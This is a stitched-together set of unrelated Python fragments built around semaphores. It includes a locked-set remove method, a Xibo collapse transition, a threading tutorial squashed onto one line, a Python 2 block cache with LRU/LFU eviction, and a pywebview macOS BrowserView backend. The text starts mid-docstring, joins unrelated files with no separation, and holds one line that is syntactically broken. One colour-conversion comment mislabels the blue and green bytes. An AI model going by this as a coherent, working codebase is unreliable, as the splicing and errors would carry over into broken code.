        Raises KeyError when `item` is absent.  BUG FIX: the original
        acquired the mutex manually, so a KeyError from set.remove left
        it locked forever; `with` guarantees release, and the permit is
        only returned after a successful remove.
        """
        with self.mutex:
            self.st.remove(item)
        self.sem.release()
class CollapseTransition(XiboTransition):
    """Exit transition that collapses a media item vertically to nothing."""

    def run(self):
        """Drive the collapse animation and block until it completes."""
        # Semaphore(1) used as a one-shot latch: the first acquire takes
        # the permit; the second acquire (below) blocks until next()
        # releases it when the animation finishes.
        self.lock = Semaphore()
        self.lock.acquire()
        # Only valid as an exit transition
        # NOTE(review): if media1 is None the second acquire below has
        # no matching release and run() would block forever — confirm
        # callers only use this as an exit transition.
        if self.media1 != None:
            if self.options1['transOutDuration'] > 0:
                self.outDuration = int(self.options1['transOutDuration'])
            else:
                self.outDuration = 1000  # default: 1 second
            self.__animate__(self.media1.getName(), self.media1.getX(),
                             self.media1.getY(), self.media1.getWidth(),
                             self.media1.getHeight(), self.outDuration,
                             self.next)
        self.lock.acquire()
        self.callback()

    def next(self):
        """Animation-complete callback: releases the latch held by run()."""
        self.lock.release()

    def __animate__(self, name, currentX, currentY, w, h, duration, callback):
        # ('ease', nodeName, animation duration, animation attribute,
        #  start position, finish position, callback on Stop,
        #  easeIn duration, easeOut duration)
        self.log.log(5, "info", "CollapseTransition: Collapsing " + name + " over " + str(duration) + "ms")
        # Shrink towards the vertical centre while height goes to zero.
        self.p.enqueue('anim', ('linear', name, duration, 'y', currentY, int(h / 2), None))
        self.p.enqueue('anim', ('linear', name, duration, 'height', int(h), 0, callback))
        self.p.enqueue('timer', (duration, self.next))
Thread(target=consumer, args=(random.randrange(n, n + max_items + 2), ))) for thread in threads: # Starts all the threads. thread.start() for thread in threads: # Waits for threads to complete before moving on with the main script. thread.join() logging.info("All done.") logging.info("Semaphore vs Bounded Semaphore") # Usually, you create a Semaphore that will allow a certain number of threads # into a section of code. This one starts at 5. s1 = Semaphore(5) # When you want to enter the section of code, you acquire it first. # That lowers it to 4. (Four more threads could enter this section.) s1.acquire() # Then you do whatever sensitive thing needed to be restricted to five threads. # When you're finished, you release the semaphore, and it goes back to 5. s1.release() # That's all fine, but you can also release it without acquiring it first. s1.release() # The counter is now 6! That might make sense in some situations, but not in most. logging.info(s1._value) # => 6 # If that doesn't make sense in your situation, use a BoundedSemaphore. s2 = BoundedSemaphore(5) # Start at 5.
class BlockCache(object):
    """In-memory metadata cache for storage blocks with LRU/LFU eviction.

    NOTE(review): despite access_cache's parameter name `block_data`,
    only the block SIZE and etag are tracked (see _put) — the
    descriptors hold CacheObjectDescriptor entries, not the data itself.
    """

    def __init__(self):
        # This will contain the actual data of each block
        self.descriptors_dict = {}
        # Structure to store the cache metadata of each block
        self.descriptors = []
        # Cache statistics
        self.get_hits = 0
        self.put_hits = 0
        self.misses = 0
        self.evictions = 0
        self.reads = 0
        self.writes = 0
        self.cache_size_bytes = 0
        # Eviction policy
        self.policy = "LFU"
        # Synchronize shared cache content
        self.semaphore = Semaphore()

    def access_cache(self, operation='PUT', block_id=None, block_data=None, etag=None):
        """Single synchronized entry point for cache access.

        Returns the eviction list for PUT, the (id, size, etag) triple
        for GET, or None when caching is disabled.
        """
        result = None
        if ENABLE_CACHE:
            # NOTE(review): an exception raised in here (e.g. the
            # unsupported-operation case) leaves the semaphore held.
            self.semaphore.acquire()
            if operation == 'PUT':
                result = self._put(block_id, block_data, etag)
            elif operation == 'GET':
                result = self._get(block_id)
            else:
                raise Exception("Unsupported cache operation" + operation)
            # Sort descriptors based on eviction policy order
            self._sort_descriptors()
            self.semaphore.release()
        return result

    def _put(self, block_id, block_size, etag):
        """Insert/refresh a block entry, evicting old ones when full.

        Returns the list of block ids evicted to make room.
        """
        self.writes += 1
        to_evict = []
        # Check if the cache is full and if the element is new
        if CACHE_MAX_SIZE <= (self.cache_size_bytes + block_size) and block_id not in self.descriptors_dict:
            # Evict as many files as necessary until having enough space for new one
            # NOTE(review): if block_size alone exceeds CACHE_MAX_SIZE this
            # pops from an empty list (IndexError) — confirm callers bound
            # block sizes.
            while (CACHE_MAX_SIZE <= (self.cache_size_bytes + block_size)):
                # Get the last element ordered by the eviction policy
                self.descriptors, evicted = self.descriptors[:-1], self.descriptors[-1]
                # Reduce the size of the cache
                self.cache_size_bytes -= evicted.size
                # Increase evictions count and record the victim
                self.evictions += 1
                to_evict.append(evicted.block_id)
                # Remove from evictions dict
                del self.descriptors_dict[evicted.block_id]
        if block_id in self.descriptors_dict:
            # Refresh path: update size/etag and count the put hit.
            descriptor = self.descriptors_dict[block_id]
            self.descriptors_dict[block_id].size = block_size
            self.descriptors_dict[block_id].etag = etag
            descriptor.put_hit()
            self.put_hits += 1
        else:
            # Add the new element to the cache
            descriptor = CacheObjectDescriptor(block_id, block_size, etag)
            self.descriptors.append(descriptor)
            self.descriptors_dict[block_id] = descriptor
            self.cache_size_bytes += block_size
        assert len(self.descriptors) == len(self.descriptors_dict.keys()) ==\
            len(self.descriptors_dict.keys()), "Unequal length in cache data structures"
        return to_evict

    def _get(self, block_id):
        """Look up a block; returns (id, size, etag), or (None, 0, '') on miss."""
        self.reads += 1
        if block_id in self.descriptors_dict:
            self.descriptors_dict[block_id].get_hit()
            self.get_hits += 1
            return block_id, self.descriptors_dict[block_id].size, self.descriptors_dict[block_id].etag
        self.misses += 1
        return None, 0, ''

    def _sort_descriptors(self):
        # Order the descriptor list depending on the policy; the eviction
        # candidate is always the LAST element after sorting.
        if self.policy == "LRU":
            self.descriptors.sort(key=lambda desc: desc.last_access, reverse=True)
        elif self.policy == "LFU":
            self.descriptors.sort(key=lambda desc: desc.get_hits, reverse=True)
        else:
            raise Exception("Unsupported caching policy.")

    def write_statistics(self, statistics_manager):
        """Push the current counters to the statistics manager."""
        if ENABLE_CACHE:
            statistics_manager.cache_state(self.get_hits, self.put_hits,
                                           self.misses, self.evictions,
                                           self.reads, self.writes,
                                           self.cache_size_bytes)

    def cache_state(self):
        """Dump cache counters and per-descriptor state (Python 2 prints)."""
        print "CACHE GET HITS: ", self.get_hits
        print "CACHE PUT HITS: ", self.put_hits
        print "CACHE MISSES: ", self.misses
        print "CACHE EVICTIONS: ", self.evictions
        print "CACHE READS: ", self.reads
        print "CACHE WRITES: ", self.writes
        print "CACHE SIZE: ", self.cache_size_bytes
        for descriptor in self.descriptors:
            print "Object: ", descriptor.block_id, descriptor.last_access, descriptor.get_hits, descriptor.put_hits, descriptor.num_accesses, descriptor.size
class BrowserView:
    """Cocoa (PyObjC) backend window for pywebview.

    Wraps an NSWindow hosting a WKWebView, wires up the window/navigation
    delegates and the JS bridge, and exposes thread-safe operations that
    marshal onto the main Cocoa thread via AppHelper.callAfter, using
    semaphores to hand results back to the calling thread.
    """

    # All live BrowserView instances keyed by window uid
    instances = {}
    app = AppKit.NSApplication.sharedApplication()
    # Running top-left point used to cascade successive windows
    cascade_loc = Foundation.NSMakePoint(100.0, 0.0)

    class WindowDelegate(AppKit.NSObject):
        def windowShouldClose_(self, window):
            # Optionally show a quit-confirmation dialog before allowing close
            i = BrowserView.get_instance('window', window)
            i.closing.set()
            quit = localization['global.quit']
            cancel = localization['global.cancel']
            msg = localization['global.quitConfirmation']
            if not i.confirm_close or BrowserView.display_confirmation_dialog(
                    quit, cancel, msg):
                return Foundation.YES
            else:
                return Foundation.NO

        def windowWillClose_(self, notification):
            # Delete the closed instance from the dict
            i = BrowserView.get_instance('window', notification.object())
            del BrowserView.instances[i.uid]
            if i.pywebview_window in windows:
                windows.remove(i.pywebview_window)
            i.closed.set()
            # Last window gone: stop the Cocoa run loop
            if BrowserView.instances == {}:
                BrowserView.app.stop_(self)

    class JSBridge(AppKit.NSObject):
        """Script-message handler that routes JS calls into Python."""

        def initWithObject_(self, window):
            super(BrowserView.JSBridge, self).init()
            self.window = window
            return self

        def userContentController_didReceiveScriptMessage_(
                self, controller, message):
            # Message body is a JSON triple: (function name, argument, call id)
            func_name, param, value_id = json.loads(message.body())
            if param is WebKit.WebUndefined.undefined():
                param = None
            js_bridge_call(self.window, func_name, param, value_id)

    class BrowserDelegate(AppKit.NSObject):
        """Combined WKUIDelegate / WKNavigationDelegate for the web view."""

        # Display a JavaScript alert panel containing the specified message
        def webView_runJavaScriptAlertPanelWithMessage_initiatedByFrame_completionHandler_(
                self, webview, message, frame, handler):
            AppKit.NSRunningApplication.currentApplication(
            ).activateWithOptions_(
                AppKit.NSApplicationActivateIgnoringOtherApps)
            alert = AppKit.NSAlert.alloc().init()
            alert.setInformativeText_(message)
            alert.runModal()
            # PyObjC needs an explicit block signature before the ObjC
            # completion handler can be invoked from Python.
            if not handler.__block_signature__:
                handler.__block_signature__ = BrowserView.pyobjc_method_signature(
                    b'v@')
            handler()

        # Display a JavaScript confirm panel containing the specified message
        def webView_runJavaScriptConfirmPanelWithMessage_initiatedByFrame_completionHandler_(
                self, webview, message, frame, handler):
            ok = localization['global.ok']
            cancel = localization['global.cancel']
            if not handler.__block_signature__:
                handler.__block_signature__ = BrowserView.pyobjc_method_signature(
                    b'v@B')
            if BrowserView.display_confirmation_dialog(ok, cancel, message):
                handler(Foundation.YES)
            else:
                handler(Foundation.NO)

        # Display an open panel for <input type="file"> element
        def webView_runOpenPanelWithParameters_initiatedByFrame_completionHandler_(
                self, webview, param, frame, handler):
            # NOTE(review): picks an arbitrary instance; assumes a single
            # window is showing the file input — confirm for multi-window use.
            i = list(BrowserView.instances.values())[0]
            files = i.create_file_dialog(OPEN_DIALOG, '',
                                         param.allowsMultipleSelection(), '',
                                         [], main_thread=True)
            if not handler.__block_signature__:
                handler.__block_signature__ = BrowserView.pyobjc_method_signature(
                    b'v@@')
            if files:
                urls = [
                    Foundation.NSURL.URLWithString_(BrowserView.quote(i))
                    for i in files
                ]
                handler(urls)
            else:
                handler(nil)

        # Open target="_blank" links in external browser
        def webView_createWebViewWithConfiguration_forNavigationAction_windowFeatures_(
                self, webview, config, action, features):
            if action.navigationType() == getattr(
                    WebKit, 'WKNavigationTypeLinkActivated', 0):
                webbrowser.open(action.request().URL().absoluteString(), 2,
                                True)
            return nil

        # WKNavigationDelegate method, invoked when a navigation decision needs to be made
        def webView_decidePolicyForNavigationAction_decisionHandler_(
                self, webview, action, handler):
            # The event that might have triggered the navigation
            event = AppKit.NSApp.currentEvent()
            if not handler.__block_signature__:
                handler.__block_signature__ = BrowserView.pyobjc_method_signature(
                    b'v@i')
            """ Disable back navigation on pressing the Delete key: """
            # Check if the requested navigation action is Back/Forward
            if action.navigationType() == getattr(
                    WebKit, 'WKNavigationTypeBackForward', 2):
                # Check if the event is a Delete key press (keyCode = 51)
                if event and event.type(
                ) == AppKit.NSKeyDown and event.keyCode() == 51:
                    # If so, ignore the request and return
                    handler(getattr(WebKit, 'WKNavigationActionPolicyCancel', 0))
                    return
            # Normal navigation, allow
            handler(getattr(WebKit, 'WKNavigationActionPolicyAllow', 1))

        # Show the webview when it finishes loading
        def webView_didFinishNavigation_(self, webview, nav):
            # Add the webview to the window if it's not yet the contentView
            i = BrowserView.get_instance('webkit', webview)
            if i:
                if not webview.window():
                    i.window.setContentView_(webview)
                    i.window.makeFirstResponder_(webview)
                # Inject the pywebview JS API, then optional text-select
                # disabling and a window.print() hook.
                script = parse_api_js(i.js_bridge.window, 'cocoa')
                i.webkit.evaluateJavaScript_completionHandler_(
                    script, lambda a, b: None)
                if not i.text_select:
                    i.webkit.evaluateJavaScript_completionHandler_(
                        disable_text_select, lambda a, b: None)
                print_hook = 'window.print = function() { window.webkit.messageHandlers.browserDelegate.postMessage("print") };'
                i.webkit.evaluateJavaScript_completionHandler_(
                    print_hook, lambda a, b: None)
                i.loaded.set()

        # Handle JavaScript window.print()
        def userContentController_didReceiveScriptMessage_(
                self, controller, message):
            if message.body() == 'print':
                i = BrowserView.get_instance('_browserDelegate', self)
                BrowserView.print_webview(i.webkit)

    class FileFilterChooser(AppKit.NSPopUpButton):
        """Accessory popup that switches the open panel's allowed file types."""

        def initWithFilter_(self, file_filter):
            super(BrowserView.FileFilterChooser, self).init()
            # file_filter: sequence of (label, [extensions]) pairs
            self.filter = file_filter
            self.addItemsWithTitles_([i[0] for i in self.filter])
            self.setAction_('onChange:')
            self.setTarget_(self)
            return self

        def onChange_(self, sender):
            option = sender.indexOfSelectedItem()
            self.window().setAllowedFileTypes_(self.filter[option][1])

    class WebKitHost(WebKit.WKWebView):
        """WKWebView subclass adding frameless-drag and hotkey handling."""

        def mouseDown_(self, event):
            # For frameless windows, remember where the drag started so
            # mouseDragged_ can move the window.
            i = BrowserView.get_instance('webkit', self)
            window = self.window()
            if i.frameless:
                windowFrame = window.frame()
                if windowFrame is None:
                    raise RuntimeError('Failed to obtain screen')
                self.initialLocation = window.convertBaseToScreen_(
                    event.locationInWindow())
                self.initialLocation.x -= windowFrame.origin.x
                self.initialLocation.y -= windowFrame.origin.y
            super(BrowserView.WebKitHost, self).mouseDown_(event)

        def mouseDragged_(self, event):
            # Manually move a frameless window to follow the mouse.
            i = BrowserView.get_instance('webkit', self)
            window = self.window()
            if i.frameless:
                screenFrame = AppKit.NSScreen.mainScreen().frame()
                if screenFrame is None:
                    raise RuntimeError('Failed to obtain screen')
                windowFrame = window.frame()
                if windowFrame is None:
                    raise RuntimeError('Failed to obtain frame')
                currentLocation = window.convertBaseToScreen_(
                    window.mouseLocationOutsideOfEventStream())
                newOrigin = AppKit.NSMakePoint(
                    (currentLocation.x - self.initialLocation.x),
                    (currentLocation.y - self.initialLocation.y))
                # Keep the window from being dragged above the screen top
                if (newOrigin.y + windowFrame.size.height) > \
                        (screenFrame.origin.y + screenFrame.size.height):
                    newOrigin.y = screenFrame.origin.y + \
                        (screenFrame.size.height + windowFrame.size.height)
                window.setFrameOrigin_(newOrigin)
            # Ctrl-click: suppress unless running with debug enabled
            if event.modifierFlags() & getattr(
                    AppKit, 'NSEventModifierFlagControl', 1 << 18):
                i = BrowserView.get_instance('webkit', self)
                if not _debug:
                    return
            super(BrowserView.WebKitHost, self).mouseDown_(event)

        def rightMouseDown_(self, event):
            # Context menu only available in debug mode
            i = BrowserView.get_instance('webkit', self)
            if _debug:
                super(BrowserView.WebKitHost, self).rightMouseDown_(event)

        def performKeyEquivalent_(self, theEvent):
            """
            Handle common hotkey shortcuts as copy/cut/paste/undo/select all/quit
            :param theEvent:
            :return:
            """
            if theEvent.type() == AppKit.NSKeyDown and theEvent.modifierFlags(
            ) & AppKit.NSCommandKeyMask:
                responder = self.window().firstResponder()
                keyCode = theEvent.keyCode()
                if responder != None:
                    handled = False
                    range_ = responder.selectedRange()
                    hasSelectedText = len(range_) > 0
                    if keyCode == 7 and hasSelectedText:  #cut
                        responder.cut_(self)
                        handled = True
                    elif keyCode == 8 and hasSelectedText:  #copy
                        responder.copy_(self)
                        handled = True
                    elif keyCode == 9:  # paste
                        responder.paste_(self)
                        handled = True
                    elif keyCode == 0:  # select all
                        responder.selectAll_(self)
                        handled = True
                    elif keyCode == 6:  # undo
                        if responder.undoManager().canUndo():
                            responder.undoManager().undo()
                            handled = True
                    elif keyCode == 12:  # quit
                        BrowserView.app.stop_(self)
                    return handled

    def __init__(self, window):
        # Register this instance and mirror the pywebview Window's state/events
        BrowserView.instances[window.uid] = self
        self.uid = window.uid
        self.pywebview_window = window
        self.js_bridge = None
        # Semaphores used to hand results from the Cocoa main thread back to
        # the caller (file dialog result, current URL).
        self._file_name = None
        self._file_name_semaphore = Semaphore(0)
        self._current_url_semaphore = Semaphore(0)
        self.closed = window.closed
        self.closing = window.closing
        self.shown = window.shown
        self.loaded = window.loaded
        self.confirm_close = window.confirm_close
        self.title = window.title
        self.text_select = window.text_select
        self.is_fullscreen = False
        self.hidden = window.hidden
        self.minimized = window.minimized
        rect = AppKit.NSMakeRect(0.0, 0.0, window.width, window.height)
        window_mask = AppKit.NSTitledWindowMask | AppKit.NSClosableWindowMask | AppKit.NSMiniaturizableWindowMask
        if window.resizable:
            window_mask = window_mask | AppKit.NSResizableWindowMask
        if window.frameless:
            window_mask = window_mask | NSFullSizeContentViewWindowMask | AppKit.NSTexturedBackgroundWindowMask
        # The allocated resources are retained because we would explicitly delete
        # this instance when its window is closed
        self.window = AppKit.NSWindow.alloc().\
            initWithContentRect_styleMask_backing_defer_(rect, window_mask, AppKit.NSBackingStoreBuffered, False).retain()
        self.window.setTitle_(window.title)
        self.window.setBackgroundColor_(
            BrowserView.nscolor_from_hex(window.background_color))
        self.window.setMinSize_(
            AppKit.NSSize(window.min_size[0], window.min_size[1]))
        self.window.setAnimationBehavior_(
            AppKit.NSWindowAnimationBehaviorDocumentWindow)
        # Cascade each new window relative to the previous one
        BrowserView.cascade_loc = self.window.cascadeTopLeftFromPoint_(
            BrowserView.cascade_loc)
        self.webkit = BrowserView.WebKitHost.alloc().initWithFrame_(
            rect).retain()
        if window.x is not None and window.y is not None:
            self.move(window.x, window.y)
        else:
            self.window.center()
        self._browserDelegate = BrowserView.BrowserDelegate.alloc().init(
        ).retain()
        self._windowDelegate = BrowserView.WindowDelegate.alloc().init(
        ).retain()
        self.webkit.setUIDelegate_(self._browserDelegate)
        self.webkit.setNavigationDelegate_(self._browserDelegate)
        self.window.setDelegate_(self._windowDelegate)
        self.frameless = window.frameless
        if window.frameless:
            # Make content full size and titlebar transparent
            self.window.setTitlebarAppearsTransparent_(True)
            self.window.setTitleVisibility_(NSWindowTitleHidden)
        else:
            # Set the titlebar color (so that it does not change with the window color)
            self.window.contentView().superview().subviews().lastObject(
            ).setBackgroundColor_(AppKit.NSColor.windowBackgroundColor())
        # Probe whether evaluateJavaScript:completionHandler: metadata is
        # registered; older PyObjC needs it registered manually.
        try:
            self.webkit.evaluateJavaScript_completionHandler_(
                '', lambda a, b: None)
        except TypeError:
            registerMetaDataForSelector(
                b'WKWebView', b'evaluateJavaScript:completionHandler:',
                _eval_js_metadata)
        config = self.webkit.configuration()
        config.userContentController().addScriptMessageHandler_name_(
            self._browserDelegate, 'browserDelegate')
        try:
            config.preferences().setValue_forKey_(
                Foundation.NO, 'backspaceKeyNavigationEnabled')
        except:
            pass
        if _debug:
            config.preferences().setValue_forKey_(Foundation.YES,
                                                  'developerExtrasEnabled')
        #config.preferences().setValue_forKey_(Foundation.YES, 'inlineMediaPlaybackRequiresPlaysInlineAttribute')
        #config.preferences().setValue_forKey_(Foundation.YES, 'allowsInlineMediaPlayback')
        #config.preferences().setValue_forKey_(Foundation.YES, 'mediaSourceEnabled')
        #config.preferences().setValue_forKey_(Foundation.NO, 'invisibleMediaAutoplayNotPermitted')
        self.js_bridge = BrowserView.JSBridge.alloc().initWithObject_(window)
        config.userContentController().addScriptMessageHandler_name_(
            self.js_bridge, 'jsBridge')
        # Load initial content: explicit URL, provided HTML, or the default page
        if window.url:
            self.url = window.url
            self.load_url(window.url)
        elif window.html:
            self.load_html(window.html, '')
        else:
            self.load_html(default_html, '')
        if window.fullscreen:
            self.toggle_fullscreen()
        self.shown.set()

    def first_show(self):
        """Show the window and, for the first window, start the Cocoa run loop."""
        if not self.hidden:
            self.window.makeKeyAndOrderFront_(self.window)
        else:
            self.hidden = False
        if self.minimized:
            self.minimize()
        if not BrowserView.app.isRunning():
            # Add the default Cocoa application menu
            self._add_app_menu()
            self._add_view_menu()
            BrowserView.app.activateIgnoringOtherApps_(Foundation.YES)
            # Blocks until the application is stopped
            BrowserView.app.run()

    def show(self):
        def _show():
            self.window.makeKeyAndOrderFront_(self.window)
        AppHelper.callAfter(_show)

    def hide(self):
        def _hide():
            self.window.orderOut_(self.window)
        AppHelper.callAfter(_hide)

    def destroy(self):
        AppHelper.callAfter(self.window.close)

    def set_title(self, title):
        def _set_title():
            self.window.setTitle_(title)
        AppHelper.callAfter(_set_title)

    def toggle_fullscreen(self):
        def toggle():
            if self.is_fullscreen:
                window_behaviour = 1 << 2  # NSWindowCollectionBehaviorManaged
            else:
                window_behaviour = 1 << 7  # NSWindowCollectionBehaviorFullScreenPrimary
            self.window.setCollectionBehavior_(window_behaviour)
            self.window.toggleFullScreen_(None)
        AppHelper.callAfter(toggle)
        self.is_fullscreen = not self.is_fullscreen

    def resize(self, width, height):
        def _resize():
            frame = self.window.frame()
            # Keep the top left of the window in the same place
            frame.origin.y += frame.size.height
            frame.origin.y -= height
            frame.size.width = width
            frame.size.height = height
            self.window.setFrame_display_(frame, True)
        AppHelper.callAfter(_resize)

    def minimize(self):
        self.window.miniaturize_(self)

    def restore(self):
        self.window.deminiaturize_(self)

    def move(self, x, y):
        # Convert from top-left (pywebview) to bottom-left (Cocoa) coordinates
        frame = self.window.frame()
        # TODO this will calculate incorrect coordinates during coordinate transfor,
        # if window is moved to another screen
        screenFrame = AppKit.NSScreen.mainScreen().frame()
        if screenFrame is None:
            raise RuntimeError('Failed to obtain screen')
        frame.origin.x = x
        frame.origin.y = screenFrame.size.height - frame.size.height - y
        self.window.setFrame_display_(frame, True)

    def get_current_url(self):
        """Fetch the web view's URL from the main thread; None for about:blank."""
        def get():
            self._current_url = str(self.webkit.URL())
            self._current_url_semaphore.release()
        AppHelper.callAfter(get)
        # Block until the main-thread closure has stored the URL
        self._current_url_semaphore.acquire()
        return None if self._current_url == 'about:blank' else self._current_url

    def load_url(self, url):
        def load(url):
            page_url = Foundation.NSURL.URLWithString_(BrowserView.quote(url))
            req = Foundation.NSURLRequest.requestWithURL_(page_url)
            self.webkit.loadRequest_(req)
        self.loaded.clear()
        self.url = url
        AppHelper.callAfter(load, url)

    def load_html(self, content, base_uri):
        def load(content, url):
            url = Foundation.NSURL.URLWithString_(BrowserView.quote(url))
            self.webkit.loadHTMLString_baseURL_(content, url)
        self.loaded.clear()
        AppHelper.callAfter(load, content, base_uri)

    def evaluate_js(self, script):
        """Run JS in the page and return the JSON-decoded result (blocking)."""
        def eval():
            self.webkit.evaluateJavaScript_completionHandler_(script, handler)

        def handler(result, error):
            JSResult.result = None if result is None or result == 'null' else json.loads(
                result)
            JSResult.result_semaphore.release()

        # Class used as a mutable holder shared with the completion handler
        class JSResult:
            result = None
            result_semaphore = Semaphore(0)

        self.loaded.wait()
        AppHelper.callAfter(eval)
        JSResult.result_semaphore.acquire()
        return JSResult.result

    def create_file_dialog(self, dialog_type, directory, allow_multiple,
                           save_filename, file_filter, main_thread=False):
        """Show a save/open/folder dialog and return the chosen path tuple.

        When main_thread is False the dialog is dispatched to the Cocoa main
        thread and this call blocks on a semaphore until it completes.
        """
        def create_dialog(*args):
            dialog_type = args[0]
            if dialog_type == SAVE_DIALOG:
                save_filename = args[2]
                save_dlg = AppKit.NSSavePanel.savePanel()
                save_dlg.setTitle_(localization['global.saveFile'])
                if directory:  # set initial directory
                    save_dlg.setDirectoryURL_(
                        Foundation.NSURL.fileURLWithPath_(directory))
                if save_filename:  # set file name
                    save_dlg.setNameFieldStringValue_(save_filename)
                if save_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton:
                    file = save_dlg.filenames()
                    self._file_name = tuple(file)
                else:
                    self._file_name = None
            else:
                allow_multiple = args[1]
                open_dlg = AppKit.NSOpenPanel.openPanel()
                # Enable the selection of files in the dialog.
                open_dlg.setCanChooseFiles_(dialog_type != FOLDER_DIALOG)
                # Enable the selection of directories in the dialog.
                open_dlg.setCanChooseDirectories_(dialog_type == FOLDER_DIALOG)
                # Enable / disable multiple selection
                open_dlg.setAllowsMultipleSelection_(allow_multiple)
                # Set allowed file extensions
                if file_filter:
                    open_dlg.setAllowedFileTypes_(file_filter[0][1])
                    # Add a menu to choose between multiple file filters
                    if len(file_filter) > 1:
                        filter_chooser = BrowserView.FileFilterChooser.alloc(
                        ).initWithFilter_(file_filter)
                        open_dlg.setAccessoryView_(filter_chooser)
                        open_dlg.setAccessoryViewDisclosed_(True)
                if directory:  # set initial directory
                    open_dlg.setDirectoryURL_(
                        Foundation.NSURL.fileURLWithPath_(directory))
                if open_dlg.runModal() == AppKit.NSFileHandlingPanelOKButton:
                    files = open_dlg.filenames()
                    self._file_name = tuple(files)
                else:
                    self._file_name = None
            if not main_thread:
                self._file_name_semaphore.release()

        if main_thread:
            create_dialog(dialog_type, allow_multiple, save_filename)
        else:
            AppHelper.callAfter(create_dialog, dialog_type, allow_multiple,
                                save_filename)
            self._file_name_semaphore.acquire()
        return self._file_name

    def _add_app_menu(self):
        """
        Create a default Cocoa menu that shows 'Services', 'Hide',
        'Hide Others', 'Show All', and 'Quit'. Will append the application name
        to some menu items if it's available.
        """
        # Set the main menu for the application
        mainMenu = AppKit.NSMenu.alloc().init()
        self.app.setMainMenu_(mainMenu)
        # Create an application menu and make it a submenu of the main menu
        mainAppMenuItem = AppKit.NSMenuItem.alloc().init()
        mainMenu.addItem_(mainAppMenuItem)
        appMenu = AppKit.NSMenu.alloc().init()
        mainAppMenuItem.setSubmenu_(appMenu)
        appMenu.addItemWithTitle_action_keyEquivalent_(
            self._append_app_name(localization["cocoa.menu.about"]),
            "orderFrontStandardAboutPanel:", "")
        appMenu.addItem_(AppKit.NSMenuItem.separatorItem())
        # Set the 'Services' menu for the app and create an app menu item
        appServicesMenu = AppKit.NSMenu.alloc().init()
        self.app.setServicesMenu_(appServicesMenu)
        servicesMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(
            localization["cocoa.menu.services"], nil, "")
        servicesMenuItem.setSubmenu_(appServicesMenu)
        appMenu.addItem_(AppKit.NSMenuItem.separatorItem())
        # Append the 'Hide', 'Hide Others', and 'Show All' menu items
        appMenu.addItemWithTitle_action_keyEquivalent_(
            self._append_app_name(localization["cocoa.menu.hide"]), "hide:",
            "h")
        hideOthersMenuItem = appMenu.addItemWithTitle_action_keyEquivalent_(
            localization["cocoa.menu.hideOthers"], "hideOtherApplications:",
            "h")
        hideOthersMenuItem.setKeyEquivalentModifierMask_(
            AppKit.NSAlternateKeyMask | AppKit.NSCommandKeyMask)
        appMenu.addItemWithTitle_action_keyEquivalent_(
            localization["cocoa.menu.showAll"], "unhideAllApplications:", "")
        appMenu.addItem_(AppKit.NSMenuItem.separatorItem())
        # Append a 'Quit' menu item
        appMenu.addItemWithTitle_action_keyEquivalent_(
            self._append_app_name(localization["cocoa.menu.quit"]),
            "terminate:", "q")

    def _add_view_menu(self):
        """
        Create a default View menu that shows 'Enter Full Screen'.
        """
        mainMenu = self.app.mainMenu()
        # Create an View menu and make it a submenu of the main menu
        viewMenu = AppKit.NSMenu.alloc().init()
        viewMenu.setTitle_(localization["cocoa.menu.view"])
        viewMenuItem = AppKit.NSMenuItem.alloc().init()
        viewMenuItem.setSubmenu_(viewMenu)
        mainMenu.addItem_(viewMenuItem)
        # TODO: localization of the Enter fullscreen string has no effect
        fullScreenMenuItem = viewMenu.addItemWithTitle_action_keyEquivalent_(
            localization["cocoa.menu.fullscreen"], "toggleFullScreen:", "f")
        fullScreenMenuItem.setKeyEquivalentModifierMask_(
            AppKit.NSControlKeyMask | AppKit.NSCommandKeyMask)

    def _append_app_name(self, val):
        """
        Append the application name to a string if it's available. If not, the
        string is returned unchanged.
        :param str val: The string to append to
        :return: String with app name appended, or unchanged string
        :rtype: str
        """
        if "CFBundleName" in info:
            val += " {}".format(info["CFBundleName"])
        return val

    @staticmethod
    def nscolor_from_hex(hex_string):
        """
        Convert given hex color to NSColor.
        :hex_string: Hex code of the color as #RGB or #RRGGBB
        """
        hex_string = hex_string[1:]  # Remove leading hash
        if len(hex_string) == 3:
            hex_string = ''.join([c * 2 for c in hex_string])  # 3-digit to 6-digit
        hex_int = int(hex_string, 16)
        rgb = (
            (hex_int >> 16) & 0xff,  # Red byte
            (hex_int >> 8) & 0xff,  # Blue byte
            (hex_int) & 0xff  # Green byte
        )
        rgb = [i / 255.0 for i in rgb]  # Normalize to range(0.0, 1.0)
        return AppKit.NSColor.colorWithSRGBRed_green_blue_alpha_(
            rgb[0], rgb[1], rgb[2], 1.0)

    @staticmethod
    def get_instance(attr, value):
        """
        Return a BrowserView instance by the :value of its given :attribute,
        and None if no match is found.
        """
        for i in list(BrowserView.instances.values()):
            try:
                if getattr(i, attr) == value:
                    return i
            except AttributeError:
                break
        return None

    @staticmethod
    def display_confirmation_dialog(first_button, second_button, message):
        # Modal two-button alert; True when the first button was chosen
        AppKit.NSApplication.sharedApplication()
        AppKit.NSRunningApplication.currentApplication().activateWithOptions_(
            AppKit.NSApplicationActivateIgnoringOtherApps)
        alert = AppKit.NSAlert.alloc().init()
        alert.addButtonWithTitle_(first_button)
        alert.addButtonWithTitle_(second_button)
        alert.setMessageText_(message)
        alert.setAlertStyle_(AppKit.NSWarningAlertStyle)
        if alert.runModal() == AppKit.NSAlertFirstButtonReturn:
            return True
        else:
            return False

    @staticmethod
    def print_webview(webview):
        # Print the web view's content using Safari-like default settings
        info = AppKit.NSPrintInfo.sharedPrintInfo().copy()
        # default print settings used by Safari
        info.setHorizontalPagination_(AppKit.NSFitPagination)
        info.setHorizontallyCentered_(Foundation.NO)
        info.setVerticallyCentered_(Foundation.NO)
        imageableBounds = info.imageablePageBounds()
        paperSize = info.paperSize()
        if (Foundation.NSWidth(imageableBounds) > paperSize.width):
            imageableBounds.origin.x = 0
            imageableBounds.size.width = paperSize.width
        if (Foundation.NSHeight(imageableBounds) > paperSize.height):
            imageableBounds.origin.y = 0
            imageableBounds.size.height = paperSize.height
        info.setBottomMargin_(Foundation.NSMinY(imageableBounds))
        info.setTopMargin_(paperSize.height - Foundation.NSMinY(imageableBounds) -
                           Foundation.NSHeight(imageableBounds))
        info.setLeftMargin_(Foundation.NSMinX(imageableBounds))
        info.setRightMargin_(paperSize.width - Foundation.NSMinX(imageableBounds) -
                             Foundation.NSWidth(imageableBounds))
        # show the print panel
        print_op = webview._printOperationWithPrintInfo_(info)
        print_op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_(
            webview.window(), nil, nil, nil)

